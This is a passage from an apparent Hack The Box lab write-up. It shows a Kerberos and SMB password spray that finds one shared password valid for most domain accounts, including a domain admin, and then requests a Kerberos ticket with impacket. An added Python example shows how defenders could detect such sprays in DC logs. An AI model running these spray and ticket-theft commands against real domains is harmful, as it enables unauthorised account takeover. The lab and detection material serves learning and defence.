Password Spray
A cleartext credential has been obtained through the hashdump: v3ryS0l!dP@sswd#X
KDC
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ kerbrute passwordspray --dc dc.university.htb -d UNIVERSITY.HTB users.txt 'v3ryS0l!dP@sswd#X'
Version: v1.0.3 (9dad6e1) - 11/03/24 - Ronnie Flathers @ropnop
2024/11/03 01:51:27 > Using KDC(s):
2024/11/03 01:51:27 > dc.university.htb:88
2024/11/03 01:51:28 > [+] VALID LOGIN: A.Crouz@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: Arnold.G@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: Emma.H@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: Choco.L@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: C.Freez@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: Alice.Z@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: George.A@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: Brose.W@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: hana@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: Jakken.C@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: John.D@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: karma.watterson@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: Kareem.A@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: Leon.K@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: Kai.K@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: Lisa.K@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 > [+] VALID LOGIN: Karol.J@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:30 > [+] VALID LOGIN: Nya.R@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:30 > [+] VALID LOGIN: Martin.T@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:30 > [+] VALID LOGIN: Rose.L@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:30 > [+] VALID LOGIN: Steven.P@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:30 > Done! Tested 26 logins (21 successes) in 2.400 seconds
It would appear that almost every user in the domain shares the same password: v3ryS0l!dP@sswd#X
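From the defender's side, the run above is 26 Kerberos pre-auth requests from one host in about 2.4 seconds with only 5 failures, so a failure-count or lockout threshold barely registers it. The following is an added example, not part of the original writeup: a sliding-window check over simplified DC Security-log records that counts distinct accounts per source regardless of outcome. The record layout, source IPs, account names and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Windows Security event IDs logged on a DC (simplified for this example):
TGT_ISSUED, PREAUTH_FAILED = 4768, 4771

def build_sample():
    """Constructed records (timestamp, event_id, account, source_ip): one source
    tries 26 accounts in ~2.3 s (21 succeed, 5 fail), plus one normal workstation."""
    t0 = datetime(2024, 11, 3, 1, 51, 27)
    events = []
    for i in range(26):
        eid = PREAUTH_FAILED if i % 6 == 0 else TGT_ISSUED
        events.append((t0 + timedelta(milliseconds=90 * i), eid, f"user{i:02d}", "10.10.14.5"))
    for i in range(4):
        events.append((t0 + timedelta(seconds=20 * i), TGT_ISSUED, "user03", "10.10.20.17"))
    return sorted(events)

def failures_per_source(events):
    """Naive view: count only failed pre-auth, as a lockout-style threshold does."""
    counts = defaultdict(int)
    for _, eid, _, src in events:
        if eid == PREAUTH_FAILED:
            counts[src] += 1
    return dict(counts)

def detect_spray(events, window=timedelta(seconds=60), min_accounts=10):
    """Flag sources touching many distinct accounts inside one sliding window,
    counting successful and failed requests alike."""
    by_src = defaultdict(list)
    for ts, eid, account, src in events:
        if eid in (TGT_ISSUED, PREAUTH_FAILED):
            by_src[src].append((ts, eid, account.lower()))
    alerts = {}
    for src, recs in by_src.items():
        recs.sort()
        start = 0
        for end in range(len(recs)):
            while recs[end][0] - recs[start][0] > window:
                start += 1  # slide the window start forward
            span = recs[start:end + 1]
            accounts = {a for _, _, a in span}
            if len(accounts) >= min_accounts and len(accounts) > alerts.get(src, {}).get("accounts", 0):
                ok = {a for _, e, a in span if e == TGT_ISSUED}
                alerts[src] = {"accounts": len(accounts), "succeeded": len(ok),
                               "failed": len(accounts - ok)}
    return alerts

if __name__ == "__main__":
    sample = build_sample()
    print("failed pre-auth per source:", failures_per_source(sample))
    print("spray alerts:", detect_spray(sample))
```

A single source authenticating successfully as many different users in seconds is the stronger signal here, since shared passwords turn most spray attempts into clean logons.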
SMB
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ crackmapexec smb $IP -u users.txt -p 'v3ryS0l!dP@sswd#X' --continue-on-success
SMB 10.10.11.39 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:university.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.39 445 DC [+] university.htb\A.Crouz:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [-] university.htb\Administrator:v3ryS0l!dP@sswd#X STATUS_LOGON_FAILURE
SMB 10.10.11.39 445 DC [+] university.htb\Alice.Z:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\Arnold.G:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\Brose.W:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\C.Freez:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\Choco.L:v3ryS0l!dP@sswd#X (Pwn3d!)
SMB 10.10.11.39 445 DC [+] university.htb\Emma.H:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\George.A:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [-] university.htb\Guest:v3ryS0l!dP@sswd#X STATUS_LOGON_FAILURE
SMB 10.10.11.39 445 DC [+] university.htb\hana:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\Jakken.C:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\John.D:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\Kai.K:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\Kareem.A:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\karma.watterson:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\Karol.J:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [-] university.htb\krbtgt:v3ryS0l!dP@sswd#X STATUS_LOGON_FAILURE
SMB 10.10.11.39 445 DC [+] university.htb\Leon.K:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\Lisa.K:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\Martin.T:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\Nya.R:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\Rose.L:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [+] university.htb\Steven.P:v3ryS0l!dP@sswd#X
SMB 10.10.11.39 445 DC [-] university.htb\WAO:v3ryS0l!dP@sswd#X STATUS_LOGON_FAILURE
SMB 10.10.11.39 445 DC [-] Connection Error: The NETBIOS connection with the remote host timed out.
The same result can be seen against the SMB server.
choco.l is a DA user.
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ impacket-getTGT 'UNIVERSITY.HTB/choco.l@dc.university.htb' -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: v3ryS0l!dP@sswd#X
[*] Saving ticket in choco.l@dc.university.htb.ccache
TGT generated for the choco.l user.
Moving on to Privilege Escalation